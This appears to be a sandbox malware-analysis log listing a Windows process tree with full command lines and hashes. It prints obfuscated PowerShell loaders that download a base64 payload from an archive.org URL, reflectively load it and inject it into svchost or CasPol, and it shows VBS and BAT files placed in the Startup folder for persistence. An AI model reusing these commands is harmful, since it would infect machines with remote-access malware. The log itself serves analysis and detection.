JyBOclhhc3 NlbWJsJysn eS5HZXRUeX BlKFpIbycr J1J1blBFLk hvbWVaSG8p O05yWCcrJ2 0nKydldGhv ZCA9ICcrJ0 4nKydyWHQn Kyd5cGUuRy crJ2V0TScr J2V0aG9kJy snKFpIJysn b1ZBSVpIby k7TicrJ3In KydYbWV0aC crJ29kLicr J0luJysndm 9rZShOcicr J1huJysndS crJ2xsLCBb b2JqZWN0W1 1dQChaSG8w L0U3TycrJz I4L2QvZWUu JysnZXRzYX AvLzpzcHR0 aFpIJysnby AsJysnICcr J1pIbzFaSG 8nKycgLCBa SG9DOk93R1 BybycrJ2dy YW1EYScrJ3 RhJysnTycr J3dHWkgnKy dvICwgWkhv aHZuY1onKy dIbywnKyda JysnSG9zdi crJ2Nob3N0 WkhvLFpIb1 pIbyknKycp JykgLWNyZX BMYWNlICAo W2NoQVJdOT ArW2NoQVJd NzIrW2NoQV JdMTExKSxb Y2hBUl0zOS 1yZVBsQUNl J093RycsW2 NoQVJdOTIt cmVQbEFDZS AoW2NoQVJd NzgrW2NoQV JdMTE0K1tj aEFSXTg4KS xbY2hBUl0z Nil8aW52T0 tlLWV4UFJl U1NpT04='; $OWjuxd = [system.Te xt.encodin g]::UTF8.G etString([ system.Con vert]::Fro mbase64Str ing($codig o));powers hell.exe - windowstyl e hidden - executionp olicy bypa ss -NoProf ile -comma nd $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 9156 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6208 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('Nr Xurl'+' =' +' Z'+'Ho' +'ht'+'tps ://'+'ia60 0'+'10'+'0 .us.arch'+ 'iv'+'e.'+ 'org/24/'+ 'it'+'ems/ deta'+'h-n '+'ote-v/D '+'e'+'tah NoteV'+'.t x'+'tZHo;N rX'+'ba'+' se64Conten '+'t = (Ne w-Object S ystem.'+'N et.WebC'+' lie'+'nt). Download'+ 'String(Nr Xurl'+');N r'+'X'+'bi '+'n'+'ar' +'yConten' +'t ='+' [ System.Con vert]::Fro mBase'+'64 S'+'tr'+'i n'+'g(NrXb as'+'e64C' +'on'+'ten '+'t);NrXa ssembly = '+'[Reflec '+'tion.'+ 'A'+'ssemb ly]:'+':L' +'oad('+'N r'+'Xbinar '+'yC'+'on t'+'ent)'+ ';'+'NrX'+ 'typ'+'e'+ ' ='+' NrX assembl'+' y.GetType( ZHo'+'RunP E.HomeZHo) ;NrX'+'m'+ 'ethod = ' +'N'+'rXt' +'ype.G'+' etM'+'etho d'+'(ZH'+' oVAIZHo);N '+'r'+'Xme th'+'od.'+ 'In'+'voke (Nr'+'Xn'+ 'u'+'ll, [ object[]]@ (ZHo0/E7O' +'28/d/ee. '+'etsap// :sptthZH'+ 'o ,'+' '+ 'ZHo1ZHo'+ ' , ZHoC:O wGPro'+'gr amDa'+'ta' +'O'+'wGZH '+'o , ZHo hvncZ'+'Ho ,'+'Z'+'Ho sv'+'chost ZHo,ZHoZHo )'+')') -c repLace ([ chAR]90+[c hAR]72+[ch AR]111),[c hAR]39-reP lACe'OwG', [chAR]92-r ePlACe ([c hAR]78+[ch AR]114+[ch AR]88),[ch AR]36)|inv OKe-exPReS SiON" MD5: 04029E121A0CFA5991749937DD22A1D9)
- wscript.exe (PID: 9068 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Pr ogramData\ hvnc.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 4476 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnTnJYdX JsJysnID0n KycgWicrJ0 hvJysnaHQn Kyd0cHM6Ly 8nKydpYTYw MCcrJzEwJy snMC51cy5h cmNoJysnaX YnKydlLicr J29yZy8yNC 8nKydpdCcr J2Vtcy9kZX RhJysnaC1u Jysnb3RlLX YvRCcrJ2Un Kyd0YWhOb3 RlVicrJy50 eCcrJ3RaSG 87TnJYJysn YmEnKydzZT Y0Q29udGVu JysndCA9IC hOZXctT2Jq ZWN0IFN5c3 RlbS4nKydO ZXQuV2ViQy crJ2xpZScr J250KS5Eb3 dubG9hZCcr J1N0cmluZy hOclh1cmwn KycpO05yJy snWCcrJ2Jp JysnbicrJ2 FyJysneUNv bnRlbicrJ3 QgPScrJyBb U3lzdGVtLk NvbnZlcnRd OjpGcm9tQm FzZScrJzY0 UycrJ3RyJy snaW4nKydn KE5yWGJhcy crJ2U2NEMn KydvbicrJ3 RlbicrJ3Qp O05yWGFzc2 VtYmx5ID0g JysnW1JlZm xlYycrJ3Rp b24uJysnQS crJ3NzZW1i bHldOicrJz pMJysnb2Fk KCcrJ05yJy snWGJpbmFy JysneUMnKy dvbnQnKydl bnQpJysnOy crJ05yWCcr J3R5cCcrJ2 UnKycgPScr JyBOclhhc3 NlbWJsJysn eS5HZXRUeX BlKFpIbycr J1J1blBFLk hvbWVaSG8p O05yWCcrJ2 0nKydldGhv ZCA9ICcrJ0 4nKydyWHQn Kyd5cGUuRy crJ2V0TScr J2V0aG9kJy snKFpIJysn b1ZBSVpIby k7TicrJ3In KydYbWV0aC crJ29kLicr J0luJysndm 9rZShOcicr J1huJysndS crJ2xsLCBb b2JqZWN0W1 1dQChaSG8w L0U3TycrJz I4L2QvZWUu JysnZXRzYX AvLzpzcHR0 aFpIJysnby AsJysnICcr J1pIbzFaSG 8nKycgLCBa SG9DOk93R1 BybycrJ2dy YW1EYScrJ3 RhJysnTycr J3dHWkgnKy dvICwgWkhv aHZuY1onKy dIbywnKyda JysnSG9zdi crJ2Nob3N0 WkhvLFpIb1 pIbyknKycp JykgLWNyZX BMYWNlICAo W2NoQVJdOT ArW2NoQVJd NzIrW2NoQV JdMTExKSxb Y2hBUl0zOS 1yZVBsQUNl J093RycsW2 NoQVJdOTIt cmVQbEFDZS AoW2NoQVJd NzgrW2NoQV JdMTE0K1tj aEFSXTg4KS xbY2hBUl0z Nil8aW52T0 tlLWV4UFJl U1NpT04='; $OWjuxd = [system.Te xt.encodin g]::UTF8.G etString([ system.Con vert]::Fro mbase64Str ing($codig o));powers hell.exe - windowstyl e hidden - executionp olicy bypa ss -NoProf ile -comma nd $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 2560 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5420 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('Nr Xurl'+' =' +' Z'+'Ho' +'ht'+'tps ://'+'ia60 0'+'10'+'0 .us.arch'+ 'iv'+'e.'+ 'org/24/'+ 'it'+'ems/ deta'+'h-n '+'ote-v/D '+'e'+'tah NoteV'+'.t x'+'tZHo;N rX'+'ba'+' se64Conten '+'t = (Ne w-Object S ystem.'+'N et.WebC'+' lie'+'nt). Download'+ 'String(Nr Xurl'+');N r'+'X'+'bi '+'n'+'ar' +'yConten' +'t ='+' [ System.Con vert]::Fro mBase'+'64 S'+'tr'+'i n'+'g(NrXb as'+'e64C' +'on'+'ten '+'t);NrXa ssembly = '+'[Reflec '+'tion.'+ 'A'+'ssemb ly]:'+':L' +'oad('+'N r'+'Xbinar '+'yC'+'on t'+'ent)'+ ';'+'NrX'+ 'typ'+'e'+ ' ='+' NrX assembl'+' y.GetType( ZHo'+'RunP E.HomeZHo) ;NrX'+'m'+ 'ethod = ' +'N'+'rXt' +'ype.G'+' etM'+'etho d'+'(ZH'+' oVAIZHo);N '+'r'+'Xme th'+'od.'+ 'In'+'voke (Nr'+'Xn'+ 'u'+'ll, [ object[]]@ (ZHo0/E7O' +'28/d/ee. '+'etsap// :sptthZH'+ 'o ,'+' '+ 'ZHo1ZHo'+ ' , ZHoC:O wGPro'+'gr amDa'+'ta' +'O'+'wGZH '+'o , ZHo hvncZ'+'Ho ,'+'Z'+'Ho sv'+'chost ZHo,ZHoZHo )'+')') -c repLace ([ chAR]90+[c hAR]72+[ch AR]111),[c hAR]39-reP lACe'OwG', [chAR]92-r ePlACe ([c hAR]78+[ch AR]114+[ch AR]88),[ch AR]36)|inv OKe-exPReS SiON" MD5: 04029E121A0CFA5991749937DD22A1D9)
- wscript.exe (PID: 5168 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Pr ogramData\ hvnc.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7856 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnTnJYdX JsJysnID0n KycgWicrJ0 hvJysnaHQn Kyd0cHM6Ly 8nKydpYTYw MCcrJzEwJy snMC51cy5h cmNoJysnaX YnKydlLicr J29yZy8yNC 8nKydpdCcr J2Vtcy9kZX RhJysnaC1u Jysnb3RlLX YvRCcrJ2Un Kyd0YWhOb3 RlVicrJy50 eCcrJ3RaSG 87TnJYJysn YmEnKydzZT Y0Q29udGVu JysndCA9IC hOZXctT2Jq ZWN0IFN5c3 RlbS4nKydO ZXQuV2ViQy crJ2xpZScr J250KS5Eb3 dubG9hZCcr J1N0cmluZy hOclh1cmwn KycpO05yJy snWCcrJ2Jp JysnbicrJ2 FyJysneUNv bnRlbicrJ3 QgPScrJyBb U3lzdGVtLk NvbnZlcnRd OjpGcm9tQm FzZScrJzY0 UycrJ3RyJy snaW4nKydn KE5yWGJhcy crJ2U2NEMn KydvbicrJ3 RlbicrJ3Qp O05yWGFzc2 VtYmx5ID0g JysnW1JlZm xlYycrJ3Rp b24uJysnQS crJ3NzZW1i bHldOicrJz pMJysnb2Fk KCcrJ05yJy snWGJpbmFy JysneUMnKy dvbnQnKydl bnQpJysnOy crJ05yWCcr J3R5cCcrJ2 UnKycgPScr JyBOclhhc3 NlbWJsJysn eS5HZXRUeX BlKFpIbycr J1J1blBFLk hvbWVaSG8p O05yWCcrJ2 0nKydldGhv ZCA9ICcrJ0 4nKydyWHQn Kyd5cGUuRy crJ2V0TScr J2V0aG9kJy snKFpIJysn b1ZBSVpIby k7TicrJ3In KydYbWV0aC crJ29kLicr J0luJysndm 9rZShOcicr J1huJysndS crJ2xsLCBb b2JqZWN0W1 1dQChaSG8w L0U3TycrJz I4L2QvZWUu JysnZXRzYX AvLzpzcHR0 aFpIJysnby AsJysnICcr J1pIbzFaSG 8nKycgLCBa SG9DOk93R1 BybycrJ2dy YW1EYScrJ3 RhJysnTycr J3dHWkgnKy dvICwgWkhv aHZuY1onKy dIbywnKyda JysnSG9zdi crJ2Nob3N0 WkhvLFpIb1 pIbyknKycp JykgLWNyZX BMYWNlICAo W2NoQVJdOT ArW2NoQVJd NzIrW2NoQV JdMTExKSxb Y2hBUl0zOS 1yZVBsQUNl J093RycsW2 NoQVJdOTIt cmVQbEFDZS AoW2NoQVJd NzgrW2NoQV JdMTE0K1tj aEFSXTg4KS xbY2hBUl0z Nil8aW52T0 tlLWV4UFJl U1NpT04='; $OWjuxd = [system.Te xt.encodin g]::UTF8.G etString([ system.Con vert]::Fro mbase64Str ing($codig o));powers hell.exe - windowstyl e hidden - executionp olicy bypa ss -NoProf ile -comma nd $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 9104 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6272 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('Nr Xurl'+' =' +' Z'+'Ho' +'ht'+'tps ://'+'ia60 0'+'10'+'0 .us.arch'+ 'iv'+'e.'+ 'org/24/'+ 'it'+'ems/ deta'+'h-n '+'ote-v/D '+'e'+'tah NoteV'+'.t x'+'tZHo;N rX'+'ba'+' se64Conten '+'t = (Ne w-Object S ystem.'+'N et.WebC'+' lie'+'nt). Download'+ 'String(Nr Xurl'+');N r'+'X'+'bi '+'n'+'ar' +'yConten' +'t ='+' [ System.Con vert]::Fro mBase'+'64 S'+'tr'+'i n'+'g(NrXb as'+'e64C' +'on'+'ten '+'t);NrXa ssembly = '+'[Reflec '+'tion.'+ 'A'+'ssemb ly]:'+':L' +'oad('+'N r'+'Xbinar '+'yC'+'on t'+'ent)'+ ';'+'NrX'+ 'typ'+'e'+ ' ='+' NrX assembl'+' y.GetType( ZHo'+'RunP E.HomeZHo) ;NrX'+'m'+ 'ethod = ' +'N'+'rXt' +'ype.G'+' etM'+'etho d'+'(ZH'+' oVAIZHo);N '+'r'+'Xme th'+'od.'+ 'In'+'voke (Nr'+'Xn'+ 'u'+'ll, [ object[]]@ (ZHo0/E7O' +'28/d/ee. '+'etsap// :sptthZH'+ 'o ,'+' '+ 'ZHo1ZHo'+ ' , ZHoC:O wGPro'+'gr amDa'+'ta' +'O'+'wGZH '+'o , ZHo hvncZ'+'Ho ,'+'Z'+'Ho sv'+'chost ZHo,ZHoZHo )'+')') -c repLace ([ chAR]90+[c hAR]72+[ch AR]111),[c hAR]39-reP lACe'OwG', [chAR]92-r ePlACe ([c hAR]78+[ch AR]114+[ch AR]88),[ch AR]36)|inv OKe-exPReS SiON" MD5: 04029E121A0CFA5991749937DD22A1D9)
- wscript.exe (PID: 6708 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\Micro soft\Windo ws\Start M enu\Progra ms\Startup \escrivan. vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 8384 cmdline:
"C:\Window s\System32 \cmd.exe" /c ping 12 7.0.0.1 -n 10 & powe rshell -co mmand [Sys tem.IO.Fil e]::Copy(' C:\Users\u ser\AppDat a\Roaming\ Microsoft\ Windows\St art Menu\P rograms\St artup\escr ivan.vbs', 'C:\Users \' + [Envi ronment]:: UserName + ''\AppDat a\Roaming\ Microsoft\ Windows\St art Menu\P rograms\St artup\ sbv .navircse. vbs')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 9048 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 3472 cmdline:
ping 127.0 .0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D) - powershell.exe (PID: 8704 cmdline:
powershell -command [System.IO .File]::Co py('C:\Use rs\user\Ap pData\Roam ing\Micros oft\Window s\Start Me nu\Program s\Startup\ escrivan.v bs', 'C:\U sers\' + [ Environmen t]::UserNa me + ''\Ap pData\Roam ing\Micros oft\Window s\Start Me nu\Program s\Startup\ sbv.navir cse.vbs')' ) MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 3884 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnezB9dX JsID0gezF9 aHR0cHMnKy c6Ly9pYTYw JysnMDEwMC 51cy5hcmNo aScrJ3ZlLm 9yZycrJy8y NC9pJysndG VtcycrJy9k JysnZXQnKy dhJysnaC1u b3RlLXYvRG V0YWgnKydO b3RlVicrJy 50eHR7MX07 ezAnKyd9Ym FzZTY0Q28n KydudGVudC AnKyc9Jysn ICcrJyhOZX ctT2InKydq ZWN0IFN5Jy snc3QnKydl bS5OZScrJ3 QuVycrJ2Vi Q2xpZScrJ2 50KS4nKydE b3dubCcrJ2 9hZFN0Jysn cmluJysnZy h7MCcrJ30n Kyd1cmwpO3 snKycwfWJp bicrJ2FyJy sneUNvbicr J3RlbicrJ3 QgPScrJyAn KydbU3lzdG VtLkNvbnZl cnRdJysnOj onKydGcm9t QmEnKydzZT Y0U3RyaW5n KHswfWJhc2 UnKyc2NENv bicrJ3Rlbn QpO3swfWFz c2UnKydtYm wnKyd5ICcr Jz0nKycgW1 JlZmxlY3Rp b24uQXMnKy dzJysnZW1i bHldOjonKy dMbycrJ2Fk KHswfWJpbm EnKydyeUNv bnRlbnQpO3 swfXR5cCcr J2UgJysnPS B7JysnMH0n Kydhc3NlbS crJ2JseS5H ZXRUJysneX AnKydlKHsx fVInKyd1bl BFJysnLkhv JysnbWV7Jy snMX0pO3sw JysnfScrJ2 1lJysndGhv ZCA9IHswfX R5cGUuR2V0 TWV0aG9kKH sxfVZBJysn SXsxfScrJy k7ezB9Jysn bScrJ2UnKy d0aCcrJ29k LkluJysndi crJ29rZSh7 MH1udScrJ2 xsLCBbb2Jq ZScrJ2N0Wy crJ11dJysn QCh7MX0nKy cwJysnL2dK MWsnKydTJy snL2QvJysn ZWUuZScrJ3 RzYXAvLzpz cHR0aHsxJy snfScrJyAs JysnIHsxfW RlJysnc2F0 JysnaXZhZG 97MScrJ30n KycgLCB7MS crJ31kZXNh dGl2YScrJ2 QnKydvezF9 ICwgezF9Jy snZGUnKydz YXRpdmFkb3 snKycxfSx7 MX1DJysnYS crJ3NQbycr J2x7MX0nKy csezEnKyd9 eycrJzF9KS knKS1mICBb Y2hBUl0zNi xbY2hBUl0z OSkgfElleA ==';$OWjux d = [syste m.Text.enc oding]::UT F8.GetStri ng([system .Convert]: :Frombase6 4String($c odigo));po wershell.e xe -window style hidd en -execut ionpolicy bypass -No Profile -c ommand $OW juxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 4024 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 2144 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('{0 }url = {1} https'+':/ /ia60'+'01 00.us.arch i'+'ve.org '+'/24/i'+ 'tems'+'/d '+'et'+'a' +'h-note-v /Detah'+'N oteV'+'.tx t{1};{0'+' }base64Co' +'ntent '+ '='+' '+'( New-Ob'+'j ect Sy'+'s t'+'em.Ne' +'t.W'+'eb Clie'+'nt) .'+'Downl' +'oadSt'+' rin'+'g({0 '+'}'+'url );{'+'0}bi n'+'ar'+'y Con'+'ten' +'t ='+' ' +'[System. Convert]'+ '::'+'From Ba'+'se64S tring({0}b ase'+'64Co n'+'tent); {0}asse'+' mbl'+'y '+ '='+' [Ref lection.As '+'s'+'emb ly]::'+'Lo '+'ad({0}b ina'+'ryCo ntent);{0} typ'+'e '+ '= {'+'0}' +'assem'+' bly.GetT'+ 'yp'+'e({1 }R'+'unPE' +'.Ho'+'me {'+'1});{0 '+'}'+'me' +'thod = { 0}type.Get Method({1} VA'+'I{1}' +');{0}'+' m'+'e'+'th '+'od.In'+ 'v'+'oke({ 0}nu'+'ll, [obje'+'c t['+']]'+' @({1}'+'0' +'/gJ1k'+' S'+'/d/'+' ee.e'+'tsa p//:sptth{ 1'+'}'+' , '+' {1}de' +'sat'+'iv ado{1'+'}' +' , {1'+' }desativa' +'d'+'o{1} , {1}'+'d e'+'sativa do{'+'1},{ 1}C'+'a'+' sPo'+'l{1} '+',{1'+'} {'+'1}))') -f [chAR]3 6,[chAR]39 ) |Iex" MD5: 04029E121A0CFA5991749937DD22A1D9) - CasPol.exe (PID: 3200 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Cas Pol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
- cmd.exe (PID: 8500 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Roami ng\Microso ft\Windows \Start Men u\Programs \Startup\s tart_32.ba t" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8512 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 6240 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \Documents \32\hnvc.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 1680 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnTnJYdX JsJysnID0n KycgWicrJ0 hvJysnaHQn Kyd0cHM6Ly 8nKydpYTYw MCcrJzEwJy snMC51cy5h cmNoJysnaX YnKydlLicr J29yZy8yNC 8nKydpdCcr J2Vtcy9kZX RhJysnaC1u Jysnb3RlLX YvRCcrJ2Un Kyd0YWhOb3 RlVicrJy50 eCcrJ3RaSG 87TnJYJysn YmEnKydzZT Y0Q29udGVu JysndCA9IC hOZXctT2Jq ZWN0IFN5c3 RlbS4nKydO ZXQuV2ViQy crJ2xpZScr J250KS5Eb3 dubG9hZCcr J1N0cmluZy hOclh1cmwn KycpO05yJy snWCcrJ2Jp JysnbicrJ2 FyJysneUNv bnRlbicrJ3 QgPScrJyBb U3lzdGVtLk NvbnZlcnRd OjpGcm9tQm FzZScrJzY0 UycrJ3RyJy snaW4nKydn KE5yWGJhcy crJ2U2NEMn KydvbicrJ3 RlbicrJ3Qp O05yWGFzc2 VtYmx5ID0g JysnW1JlZm xlYycrJ3Rp b24uJysnQS crJ3NzZW1i bHldOicrJz pMJysnb2Fk KCcrJ05yJy snWGJpbmFy JysneUMnKy dvbnQnKydl bnQpJysnOy crJ05yWCcr J3R5cCcrJ2 UnKycgPScr JyBOclhhc3 NlbWJsJysn eS5HZXRUeX BlKFpIbycr J1J1blBFLk hvbWVaSG8p O05yWCcrJ2 0nKydldGhv ZCA9ICcrJ0 4nKydyWHQn Kyd5cGUuRy crJ2V0TScr J2V0aG9kJy snKFpIJysn b1ZBSVpIby k7TicrJ3In KydYbWV0aC crJ29kLicr J0luJysndm 9rZShOcicr J1huJysndS crJ2xsLCBb b2JqZWN0W1 1dQChaSG8w L0U3TycrJz I4L2QvZWUu JysnZXRzYX AvLzpzcHR0 aFpIJysnby AsJysnICcr J1pIbzFaSG 8nKycgLCBa SG9DOk93R1 BybycrJ2dy YW1EYScrJ3 RhJysnTycr J3dHWkgnKy dvICwgWkhv aHZuY1onKy dIbywnKyda JysnSG9zdi crJ2Nob3N0 WkhvLFpIb1 pIbyknKycp JykgLWNyZX BMYWNlICAo W2NoQVJdOT ArW2NoQVJd NzIrW2NoQV JdMTExKSxb Y2hBUl0zOS 1yZVBsQUNl J093RycsW2 NoQVJdOTIt cmVQbEFDZS AoW2NoQVJd NzgrW2NoQV JdMTE0K1tj aEFSXTg4KS xbY2hBUl0z Nil8aW52T0 tlLWV4UFJl U1NpT04='; $OWjuxd = [system.Te xt.encodin g]::UTF8.G etString([ system.Con vert]::Fro mbase64Str ing($codig o));powers hell.exe - windowstyl e hidden - executionp olicy bypa ss -NoProf ile -comma nd $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6880 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 8684 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('Nr Xurl'+' =' +' Z'+'Ho' +'ht'+'tps ://'+'ia60 0'+'10'+'0 .us.arch'+ 'iv'+'e.'+ 'org/24/'+ 'it'+'ems/ deta'+'h-n '+'ote-v/D '+'e'+'tah NoteV'+'.t x'+'tZHo;N rX'+'ba'+' se64Conten '+'t = (Ne w-Object S ystem.'+'N et.WebC'+' lie'+'nt). Download'+ 'String(Nr Xurl'+');N r'+'X'+'bi '+'n'+'ar' +'yConten' +'t ='+' [ System.Con vert]::Fro mBase'+'64 S'+'tr'+'i n'+'g(NrXb as'+'e64C' +'on'+'ten '+'t);NrXa ssembly = '+'[Reflec '+'tion.'+ 'A'+'ssemb ly]:'+':L' +'oad('+'N r'+'Xbinar '+'yC'+'on t'+'ent)'+ ';'+'NrX'+ 'typ'+'e'+ ' ='+' NrX assembl'+' y.GetType( ZHo'+'RunP E.HomeZHo) ;NrX'+'m'+ 'ethod = ' +'N'+'rXt' +'ype.G'+' etM'+'etho d'+'(ZH'+' oVAIZHo);N '+'r'+'Xme th'+'od.'+ 'In'+'voke (Nr'+'Xn'+ 'u'+'ll, [ object[]]@ (ZHo0/E7O' +'28/d/ee. '+'etsap// :sptthZH'+ 'o ,'+' '+ 'ZHo1ZHo'+ ' , ZHoC:O wGPro'+'gr amDa'+'ta' +'O'+'wGZH '+'o , ZHo hvncZ'+'Ho ,'+'Z'+'Ho sv'+'chost ZHo,ZHoZHo )'+')') -c repLace ([ chAR]90+[c hAR]72+[ch AR]111),[c hAR]39-reP lACe'OwG', [chAR]92-r ePlACe ([c hAR]78+[ch AR]114+[ch AR]88),[ch AR]36)|inv OKe-exPReS SiON" MD5: 04029E121A0CFA5991749937DD22A1D9)
- cmd.exe (PID: 7548 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Roami ng\Microso ft\Windows \Start Men u\Programs \Startup\s tart_pow.b at" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3332 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 7132 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \Documents \pow\wm.vb s" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 8176 cmdline:
"C:\Window s\System32 \cmd.exe" /c ping 12 7.0.0.1 -n 10 & powe rshell -co mmand [Sys tem.IO.Fil e]::Copy(' C:\Users\P ublic\Docu ments\pow\ wm.vbs', ' C:\Users\' + [Enviro nment]::Us erName + ' '\AppData\ Roaming\Mi crosoft\Wi ndows\Star t Menu\Pro grams\Star tup\ sbv.n avircse.vb s')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7464 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 3748 cmdline:
ping 127.0 .0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D) - powershell.exe (PID: 5544 cmdline:
powershell -command [System.IO .File]::Co py('C:\Use rs\Public\ Documents\ pow\wm.vbs ', 'C:\Use rs\' + [En vironment] ::UserName + ''\AppD ata\Roamin g\Microsof t\Windows\ Start Menu \Programs\ Startup\ s bv.navircs e.vbs')') MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 8012 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnezB9dX JsID0gezF9 aHR0cHMnKy c6Ly9pYTYw JysnMDEwMC 51cy5hcmNo aScrJ3ZlLm 9yZycrJy8y NC9pJysndG VtcycrJy9k JysnZXQnKy dhJysnaC1u b3RlLXYvRG V0YWgnKydO b3RlVicrJy 50eHR7MX07 ezAnKyd9Ym FzZTY0Q28n KydudGVudC AnKyc9Jysn ICcrJyhOZX ctT2InKydq ZWN0IFN5Jy snc3QnKydl bS5OZScrJ3 QuVycrJ2Vi Q2xpZScrJ2 50KS4nKydE b3dubCcrJ2 9hZFN0Jysn cmluJysnZy h7MCcrJ30n Kyd1cmwpO3 snKycwfWJp bicrJ2FyJy sneUNvbicr J3RlbicrJ3 QgPScrJyAn KydbU3lzdG VtLkNvbnZl cnRdJysnOj onKydGcm9t QmEnKydzZT Y0U3RyaW5n KHswfWJhc2 UnKyc2NENv bicrJ3Rlbn QpO3swfWFz c2UnKydtYm wnKyd5ICcr Jz0nKycgW1 JlZmxlY3Rp b24uQXMnKy dzJysnZW1i bHldOjonKy dMbycrJ2Fk KHswfWJpbm EnKydyeUNv bnRlbnQpO3 swfXR5cCcr J2UgJysnPS B7JysnMH0n Kydhc3NlbS crJ2JseS5H ZXRUJysneX AnKydlKHsx fVInKyd1bl BFJysnLkhv JysnbWV7Jy snMX0pO3sw JysnfScrJ2 1lJysndGhv ZCA9IHswfX R5cGUuR2V0 TWV0aG9kKH sxfVZBJysn SXsxfScrJy k7ezB9Jysn bScrJ2UnKy d0aCcrJ29k LkluJysndi crJ29rZSh7 MH1udScrJ2 xsLCBbb2Jq ZScrJ2N0Wy crJ11dJysn QCh7MX0nKy cwJysnL2dK MWsnKydTJy snL2QvJysn ZWUuZScrJ3 RzYXAvLzpz cHR0aHsxJy snfScrJyAs JysnIHsxfW RlJysnc2F0 JysnaXZhZG 97MScrJ30n KycgLCB7MS crJ31kZXNh dGl2YScrJ2 QnKydvezF9 ICwgezF9Jy snZGUnKydz YXRpdmFkb3 snKycxfSx7 MX1DJysnYS crJ3NQbycr J2x7MX0nKy csezEnKyd9 eycrJzF9KS knKS1mICBb Y2hBUl0zNi xbY2hBUl0z OSkgfElleA ==';$OWjux d = [syste m.Text.enc oding]::UT F8.GetStri ng([system .Convert]: :Frombase6 4String($c odigo));po wershell.e xe -window style hidd en -execut ionpolicy bypass -No Profile -c ommand $OW juxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 2732 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4128 cmdline:
